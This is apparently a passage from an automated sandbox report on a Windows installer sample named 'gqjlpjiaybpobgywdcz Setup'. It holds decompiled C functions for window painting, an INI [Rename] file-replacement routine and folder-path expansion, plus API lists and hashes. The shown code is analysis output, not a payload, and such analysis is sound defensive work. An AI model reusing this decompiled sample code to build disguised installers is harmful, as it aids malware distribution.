                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                            • GetSysColor.USER32(?), ref: 00404099
                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                            • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                            • GetDlgItem.USER32 ref: 00404141
                                                                                            • SendMessageA.USER32(00000000), ref: 00404144
                                                                                            • GetDlgItem.USER32 ref: 0040416F
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                            • LoadCursorA.USER32 ref: 004041BE
                                                                                            • SetCursor.USER32(00000000), ref: 004041C7
                                                                                            • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                            • LoadCursorA.USER32 ref: 004041E7
                                                                                            • SetCursor.USER32(00000000), ref: 004041EA
                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                            • String ID: N$P{Q$gqeqcda$open
                                                                                            • API String ID: 3615053054-2685587732
                                                                                            • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                            • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                                                            • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                            • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 90%
                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x5137d0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "gqjlpjiaybpobgywdcz Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0x10020e
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                            0x0040100a
                                                                                            0x00401039
                                                                                            0x00401047
                                                                                            0x0040104d
                                                                                            0x00401051
                                                                                            0x0040105b
                                                                                            0x00401061
                                                                                            0x00401064
                                                                                            0x004010f3
                                                                                            0x00401089
                                                                                            0x0040108c
                                                                                            0x004010a6
                                                                                            0x004010bd
                                                                                            0x004010cc
                                                                                            0x004010cf
                                                                                            0x004010d5
                                                                                            0x004010d9
                                                                                            0x004010e4
                                                                                            0x004010ed
                                                                                            0x004010ef
                                                                                            0x004010ef
                                                                                            0x00401100
                                                                                            0x00401105
                                                                                            0x0040110d
                                                                                            0x00401110
                                                                                            0x00401112
                                                                                            0x00401118
                                                                                            0x0040111f
                                                                                            0x00401126
                                                                                            0x00401130
                                                                                            0x00401142
                                                                                            0x00401156
                                                                                            0x00401160
                                                                                            0x00401165
                                                                                            0x00401165
                                                                                            0x00401110
                                                                                            0x0040116e
                                                                                            0x00000000
                                                                                            0x00401178
                                                                                            0x00401010
                                                                                            0x00401013
                                                                                            0x00401015
                                                                                            0x00401019
                                                                                            0x0040101f
                                                                                            0x0040101f
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextA.USER32(00000000,gqjlpjiaybpobgywdcz Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F$gqjlpjiaybpobgywdcz Setup
                                                                                            • API String ID: 941294808-346492725
                                                                                            • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                            • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                                                            • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                            • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x5137d0
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                            0x0040591b
                                                                                            0x00405922
                                                                                            0x00405926
                                                                                            0x0040592f
                                                                                            0x00405933
                                                                                            0x00405a72
                                                                                            0x00405a72
                                                                                            0x00000000
                                                                                            0x00405a72
                                                                                            0x00405933
                                                                                            0x0040593f
                                                                                            0x00405955
                                                                                            0x0040597d
                                                                                            0x00405988
                                                                                            0x0040598c
                                                                                            0x004059ac
                                                                                            0x004059ae
                                                                                            0x004059b3
                                                                                            0x004059bd
                                                                                            0x004059ca
                                                                                            0x004059cf
                                                                                            0x004059d4
                                                                                            0x004059d8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004059e7
                                                                                            0x004059e9
                                                                                            0x004059f6
                                                                                            0x004059fa
                                                                                            0x00405a6b
                                                                                            0x00405a6c
                                                                                            0x00000000
                                                                                            0x00405a16
                                                                                            0x00405a23
                                                                                            0x00405a88
                                                                                            0x00405a8f
                                                                                            0x00405a36
                                                                                            0x00405a36
                                                                                            0x00405a38
                                                                                            0x00405a41
                                                                                            0x00405a4c
                                                                                            0x00405a5e
                                                                                            0x00405a65
                                                                                            0x00000000
                                                                                            0x00405a65
                                                                                            0x00405a91
                                                                                            0x00405a92
                                                                                            0x00405a97
                                                                                            0x00405a99
                                                                                            0x00405aa6
                                                                                            0x00405aa6
                                                                                            0x00405aaa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405a9b
                                                                                            0x00405a9b
                                                                                            0x00405a9e
                                                                                            0x00405aa1
                                                                                            0x00405aa2
                                                                                            0x00000000
                                                                                            0x00405a9b
                                                                                            0x00405a2e
                                                                                            0x00405a33
                                                                                            0x00000000
                                                                                            0x00405a33
                                                                                            0x004059fa
                                                                                            0x00405957
                                                                                            0x00405962
                                                                                            0x0040596b
                                                                                            0x0040596f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040596f
                                                                                            0x00405a7c

                                                                                            APIs
                                                                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                            • GetShortPathNameA.KERNEL32 ref: 0040596B
                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405988
                                                                                            • wsprintfA.USER32 ref: 004059A6
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                            • GlobalFree.KERNEL32 ref: 00405A65
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                              • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                              • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                            • String ID: %s=%s$[Rename]
                                                                                            • API String ID: 3445103937-1727408572
                                                                                            • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                            • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                            • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                            • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405BE9, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x51901c
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x517b50
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x73e81340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}






























                                                                                            0x00405be9
                                                                                            0x00405be9
                                                                                            0x00405be9
                                                                                            0x00405bef
                                                                                            0x00405bf4
                                                                                            0x00405bf6
                                                                                            0x00405c05
                                                                                            0x00405c05
                                                                                            0x00405c07
                                                                                            0x00405c10
                                                                                            0x00405c12
                                                                                            0x00405c17
                                                                                            0x00405c1a
                                                                                            0x00405c1b
                                                                                            0x00405c22
                                                                                            0x00405c24
                                                                                            0x00405c2a
                                                                                            0x00405c2d
                                                                                            0x00405c2d
                                                                                            0x00405e06
                                                                                            0x00405e06
                                                                                            0x00405e0a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c3a
                                                                                            0x00405c40
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c46
                                                                                            0x00405c47
                                                                                            0x00405c4a
                                                                                            0x00405c4d
                                                                                            0x00405df9
                                                                                            0x00405e03
                                                                                            0x00405e05
                                                                                            0x00405e05
                                                                                            0x00405dfb
                                                                                            0x00405dfd
                                                                                            0x00405dff
                                                                                            0x00405e00
                                                                                            0x00405e00
                                                                                            0x00000000
                                                                                            0x00405df9
                                                                                            0x00405c53
                                                                                            0x00405c57
                                                                                            0x00405c67
                                                                                            0x00405c6b
                                                                                            0x00405c72
                                                                                            0x00405c75
                                                                                            0x00405c79
                                                                                            0x00405c7f
                                                                                            0x00405c82
                                                                                            0x00405c85
                                                                                            0x00405c88
                                                                                            0x00405da3
                                                                                            0x00405da6
                                                                                            0x00405dd6
                                                                                            0x00405dd9
                                                                                            0x00405dde
                                                                                            0x00405de2
                                                                                            0x00405de2
                                                                                            0x00405de7
                                                                                            0x00405de8
                                                                                            0x00405ded
                                                                                            0x00405df0
                                                                                            0x00405df2
                                                                                            0x00000000
                                                                                            0x00405df2
                                                                                            0x00405da8
                                                                                            0x00405dab
                                                                                            0x00405dc0
                                                                                            0x00405dc7
                                                                                            0x00405dad
                                                                                            0x00405db4
                                                                                            0x00405db4
                                                                                            0x00405dcf
                                                                                            0x00405dd2
                                                                                            0x00405d9b
                                                                                            0x00405d9c
                                                                                            0x00405d9c
                                                                                            0x00000000
                                                                                            0x00405dd2
                                                                                            0x00405c90
                                                                                            0x00405c91
                                                                                            0x00405c97
                                                                                            0x00405c99
                                                                                            0x00405cb3
                                                                                            0x00405cb3
                                                                                            0x00405cba
                                                                                            0x00405cba
                                                                                            0x00405cc1
                                                                                            0x00405cc5
                                                                                            0x00405cc5
                                                                                            0x00405cc6
                                                                                            0x00405cc8
                                                                                            0x00405d01
                                                                                            0x00405d04
                                                                                            0x00405d14
                                                                                            0x00405d17
                                                                                            0x00405d1f
                                                                                            0x00405d25
                                                                                            0x00405d25
                                                                                            0x00405d81
                                                                                            0x00405d81
                                                                                            0x00405d83
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d29
                                                                                            0x00405d30
                                                                                            0x00405d31
                                                                                            0x00405d33
                                                                                            0x00405d4d
                                                                                            0x00405d5b
                                                                                            0x00405d61
                                                                                            0x00405d63
                                                                                            0x00405d7e
                                                                                            0x00405d7e
                                                                                            0x00405d7e
                                                                                            0x00000000
                                                                                            0x00405d7e
                                                                                            0x00405d69
                                                                                            0x00405d74
                                                                                            0x00405d7a
                                                                                            0x00405d7c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d7c
                                                                                            0x00405d35
                                                                                            0x00405d38
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d47
                                                                                            0x00405d49
                                                                                            0x00405d4b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d4b
                                                                                            0x00000000
                                                                                            0x00405d81
                                                                                            0x00405d0c
                                                                                            0x00000000
                                                                                            0x00405cca
                                                                                            0x00405ccf
                                                                                            0x00405ce5
                                                                                            0x00405cea
                                                                                            0x00405ced
                                                                                            0x00405d8a
                                                                                            0x00405d8a
                                                                                            0x00405d8e
                                                                                            0x00405d96
                                                                                            0x00405d96
                                                                                            0x00000000
                                                                                            0x00405d8e
                                                                                            0x00405cf7
                                                                                            0x00405d85
                                                                                            0x00405d85
                                                                                            0x00405d88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d88
                                                                                            0x00405cc8
                                                                                            0x00405c9b
                                                                                            0x00405c9f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ca1
                                                                                            0x00405ca5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ca7
                                                                                            0x00405cab
                                                                                            0x00000000
                                                                                            0x00405cad
                                                                                            0x00405cad
                                                                                            0x00000000
                                                                                            0x00405cad
                                                                                            0x00405cab
                                                                                            0x00405e10
                                                                                            0x00405e1a
                                                                                            0x00405e26
                                                                                            0x00405e26
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                                                                            • GetWindowsDirectoryA.KERNEL32(gqeqcda,00000400), ref: 00405D1F
                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0041CC48), ref: 00405D5B
                                                                                            • SHGetPathFromIDListA.SHELL32(0041CC48,gqeqcda), ref: 00405D69
                                                                                            • CoTaskMemFree.OLE32(0041CC48), ref: 00405D74
                                                                                            • lstrcatA.KERNEL32(gqeqcda,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                            • lstrlenA.KERNEL32(gqeqcda,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                            • String ID: P{Q$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$gqeqcda
                                                                                            • API String ID: 900638850-2636713289
                                                                                            • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
